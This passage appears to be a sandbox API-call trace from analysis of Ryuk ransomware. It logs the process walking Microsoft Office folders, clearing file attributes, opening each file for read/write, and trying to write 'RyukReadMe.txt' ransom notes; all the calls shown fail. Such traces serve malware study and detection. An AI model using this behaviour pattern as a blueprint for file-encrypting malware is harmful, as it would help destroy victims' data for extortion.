(lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB02198_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\publisher\\backgrounds\\wb02198_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.482] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.482] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.483] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.483] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.483] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB02201_.GIF", dwFileAttributes=0x80) returned 0 [0135.483] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB02201_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\publisher\\backgrounds\\wb02201_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.483] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.483] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.483] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.483] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.483] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB02214_.GIF", dwFileAttributes=0x80) returned 0 [0135.483] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB02214_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\publisher\\backgrounds\\wb02214_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.484] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.484] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.484] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.484] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.484] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB02218_.GIF", dwFileAttributes=0x80) returned 0 [0135.485] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB02218_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\publisher\\backgrounds\\wb02218_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.485] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.485] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.485] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0135.485] FindClose (in: hFindFile=0x3bb4e0 | out: hFindFile=0x3bb4e0) returned 1 [0135.486] SetLastError (dwErrCode=0x0) [0135.486] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\publisher\\backgrounds\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.488] GetLastError () returned 0x5 [0135.488] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0135.488] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.488] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0 [0135.488] FindClose (in: hFindFile=0x3bd480 | out: hFindFile=0x3bd480) returned 1 [0135.489] SetLastError (dwErrCode=0x0) [0135.489] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\publisher\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.489] GetLastError () returned 0x5 [0135.489] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0135.489] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.489] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0 [0135.489] FindClose (in: hFindFile=0x3bd420 | out: hFindFile=0x3bd420) returned 1 [0135.489] SetLastError (dwErrCode=0x0) [0135.489] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.489] GetLastError () returned 0x5 [0135.489] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0) returned 0 [0135.489] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.489] FindNextFileW (in: hFindFile=0x3c3ef0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0135.489] SetLastError (dwErrCode=0x0) [0135.489] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.489] GetLastError () returned 0x5 [0135.489] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0) returned 0 [0135.489] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.489] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\*.*", lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0x3bd420 [0135.491] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0135.492] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0135.492] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.492] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Adjacency.thmx", dwFileAttributes=0x80) returned 0 [0135.493] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Adjacency.thmx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\adjacency.thmx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.493] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.493] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.493] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0135.493] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.494] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Angles.thmx", dwFileAttributes=0x80) returned 0 [0135.494] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Angles.thmx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\angles.thmx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.494] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.494] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.494] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0135.494] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.495] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Apex.thmx", dwFileAttributes=0x80) returned 0 [0135.495] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Apex.thmx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\apex.thmx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.495] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.495] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.496] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0135.496] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.496] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Apothecary.thmx", dwFileAttributes=0x80) returned 0 [0135.499] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Apothecary.thmx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\apothecary.thmx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.499] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.499] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.499] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0135.499] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.499] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Aspect.thmx", dwFileAttributes=0x80) returned 0 [0135.500] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Aspect.thmx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\aspect.thmx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.500] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.500] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.500] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0135.500] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.501] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Austin.thmx", dwFileAttributes=0x80) returned 0 [0135.501] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Austin.thmx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\austin.thmx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.501] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.501] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.502] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0135.502] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.502] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Black Tie.thmx", dwFileAttributes=0x80) returned 0 [0135.502] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Black Tie.thmx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\black tie.thmx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.502] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.503] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.503] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0135.503] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.503] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Civic.thmx", dwFileAttributes=0x80) returned 0 [0135.503] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Civic.thmx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\civic.thmx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.504] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.504] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.504] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0135.504] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.504] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Clarity.thmx", dwFileAttributes=0x80) returned 0 [0135.505] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Clarity.thmx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\clarity.thmx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.505] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.505] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.505] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0135.505] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.505] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Composite.thmx", dwFileAttributes=0x80) returned 0 [0135.506] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Composite.thmx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\composite.thmx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.506] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.506] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.506] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0135.506] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.506] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Concourse.thmx", dwFileAttributes=0x80) returned 0 [0135.507] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Concourse.thmx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\concourse.thmx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.507] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.507] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.507] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0135.507] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.507] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Couture.thmx", dwFileAttributes=0x80) returned 0 [0135.508] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Couture.thmx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\couture.thmx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.508] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.508] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.508] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0135.508] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.509] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Elemental.thmx", dwFileAttributes=0x80) returned 0 [0135.509] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Elemental.thmx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\elemental.thmx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.509] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.509] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.509] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0135.509] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.510] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Equity.thmx", dwFileAttributes=0x80) returned 0 [0135.510] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Equity.thmx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\equity.thmx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.510] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.510] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.511] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0135.511] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.511] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Essential.thmx", dwFileAttributes=0x80) returned 0 [0135.511] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Essential.thmx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\essential.thmx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.511] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.512] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.512] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0135.512] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.512] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Executive.thmx", dwFileAttributes=0x80) returned 0 [0135.513] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Executive.thmx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\executive.thmx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.513] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.513] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.513] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0135.513] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.513] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Flow.thmx", dwFileAttributes=0x80) returned 0 [0135.514] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Flow.thmx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\flow.thmx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.514] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.514] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.514] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0135.514] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.515] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Foundry.thmx", dwFileAttributes=0x80) returned 0 [0135.515] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Foundry.thmx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\foundry.thmx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.515] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.515] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.516] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0135.516] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.516] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Grid.thmx", dwFileAttributes=0x80) returned 0 [0135.516] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Grid.thmx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\grid.thmx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.516] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.516] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.517] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0135.517] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.517] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Hardcover.thmx", dwFileAttributes=0x80) returned 0 [0135.517] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Hardcover.thmx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\hardcover.thmx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.517] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.517] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.518] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0135.518] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.518] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Horizon.thmx", dwFileAttributes=0x80) returned 0 [0135.518] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Horizon.thmx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\horizon.thmx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.518] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.518] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.519] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0135.519] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.519] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Median.thmx", dwFileAttributes=0x80) returned 0 [0135.519] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Median.thmx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\median.thmx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.519] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.520] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.520] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0135.520] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.520] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Metro.thmx", dwFileAttributes=0x80) returned 0 [0135.520] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Metro.thmx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\metro.thmx"), 